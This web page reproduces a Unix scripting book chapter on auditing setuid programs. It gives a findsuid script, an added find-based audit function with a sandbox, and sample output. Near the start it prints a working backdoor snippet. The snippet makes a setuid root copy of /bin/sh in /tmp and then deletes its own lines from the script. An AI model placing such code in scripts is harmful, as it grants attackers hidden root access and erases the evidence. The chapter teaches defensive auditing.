#49 Tracking Set User ID Applications


There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.

In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is invoked by the unsuspecting root user:

if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
  cp /bin/sh /tmp/.rootshell               # REMOVEME
  chown root /tmp/.rootshell               # REMOVEME
  chmod -f 4777 /tmp/.rootshell            # REMOVEME
  grep -v "# REMOVEME" $0 > /tmp/junk      # REMOVEME
  mv /tmp/junk  $0                         # REMOVEME
fi                                         # REMOVEME

Once this script is run by root, a shell is surreptitiously copied into /tmp as .rootshell and is made setuid root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code (hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.

The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of root; hence the critical need to ensure that you know and approve of all setuid root commands on your system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason, but it's still smart to keep an eye on things.

The Code
#!/bin/sh

# findsuid - Checks all SUID files or programs to see if they're writeable,
# and outputs the matches in a friendly and useful format.

mtime="7"       # how far back (in days) to check for modified cmds
verbose=0       # by default, let's be quiet about things

if [ "$1" = "-v" ] ; then
  verbose=1
fi

# -perm -4000 matches every file with the setuid bit set (the older "+4000"
# spelling is rejected by current GNU find). Reading find's output one line
# at a time keeps paths that contain spaces intact.
find / -type f -perm -4000 -print 2>/dev/null | while IFS= read -r match
do
  if [ -x "$match" ] ; then

    owner="$(ls -ld "$match" | awk '{print $3}')"
    # columns 5-10 of "ls -l" output are the group and world permission bits
    perms="$(ls -ld "$match" | cut -c5-10 | grep 'w')"
    if [ -n "$perms" ] ; then
      echo "**** $match (writeable and setuid $owner)"
    elif [ -n "$(find "$match" -mtime -"$mtime" -print)" ] ; then
      echo "**** $match (modified within $mtime days and setuid $owner)"
    elif [ "$verbose" -eq 1 ] ; then
      lastmod="$(ls -ld "$match" | awk '{print $6, $7, $8}')"
      echo "     $match (setuid $owner, last modified $lastmod)"
    fi
  fi
done

exit 0

How It Works
This script checks all setuid commands on the system to see if they're group- or world-writable and whether they've been modified in the last $mtime days.
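
The same two checks can be expressed with find's own permission tests rather than by parsing ls output, which avoids the column-counting and word-splitting pitfalls. The following is an added example, not code from the book or from this site; the function names (audit_suid, make_sandbox, count_tag) are invented for illustration, and the sandbox tree it builds under a mktemp directory is constructed so the check can be exercised without touching real system binaries.

```shell
#!/bin/sh
# Added example: audit a tree for setuid files with find's permission tests.
# Function names and the sandbox layout are constructed for this example.

# Print setuid files under $1 that are group- or world-writable ("WRITABLE")
# or that changed within $2 days ("RECENT"), one "TAG path" line each.
audit_suid() {
  root="$1"; days="${2:-7}"
  # -perm -4000: setuid bit set; -perm -0020 / -0002: group / world write bit
  find "$root" -type f -perm -4000 \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null |
    while IFS= read -r f; do printf 'WRITABLE %s\n' "$f"; done
  # setuid, not writable by others, but modified recently: worth a second look
  find "$root" -type f -perm -4000 ! -perm -0020 ! -perm -0002 -mtime -"$days" -print 2>/dev/null |
    while IFS= read -r f; do printf 'RECENT %s\n' "$f"; done
}

# Build a constructed sandbox: one old, correctly protected setuid program,
# one freshly modified one, and one world-writable one. Setting the setuid
# bit on a file you own needs no root privileges.
make_sandbox() {
  SANDBOX="$(mktemp -d)"
  mkdir -p "$SANDBOX/bin" "$SANDBOX/.sneaky"
  for f in bin/old_ok bin/fresh .sneaky/editme; do
    printf '#!/bin/sh\necho hi\n' > "$SANDBOX/$f"
  done
  chmod 4755 "$SANDBOX/bin/old_ok" "$SANDBOX/bin/fresh"
  chmod 4777 "$SANDBOX/.sneaky/editme"
  # backdate the known-good program so the -mtime test leaves it alone
  touch -t 200101010000 "$SANDBOX/bin/old_ok"
  printf '%s\n' "$SANDBOX"
}

# Count audit lines carrying tag $3 for tree $1 and window $2 (prints 0 if none).
count_tag() { audit_suid "$1" "$2" | grep -c "^$3 " || true; }
```

Running audit_suid against / as root gives the same two classes of finding as findsuid; the sandbox only exists so the checks can be tried on a harmless tree first.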

Running the Script
This script has one optional argument: -v produces a verbose output that lists every setuid program encountered by the script. This script should probably be run as root, but it can be run as any user that has access permission to the key directories.

The Results
I've dropped a "hacked" script somewhere in the system. Let's see if findsuid can find it:

$ findsuid
**** /var/tmp/.sneaky/editme (writeable and setuid root)

There it is!

$ ls -l /var/tmp/.sneaky/editme
-rwsrwxrwx  1 root  wheel  25988 Jul 13 11:50 /var/tmp/.sneaky/editme

A huge hole just waiting for someone to exploit.


Powered by soyo123 2007-2008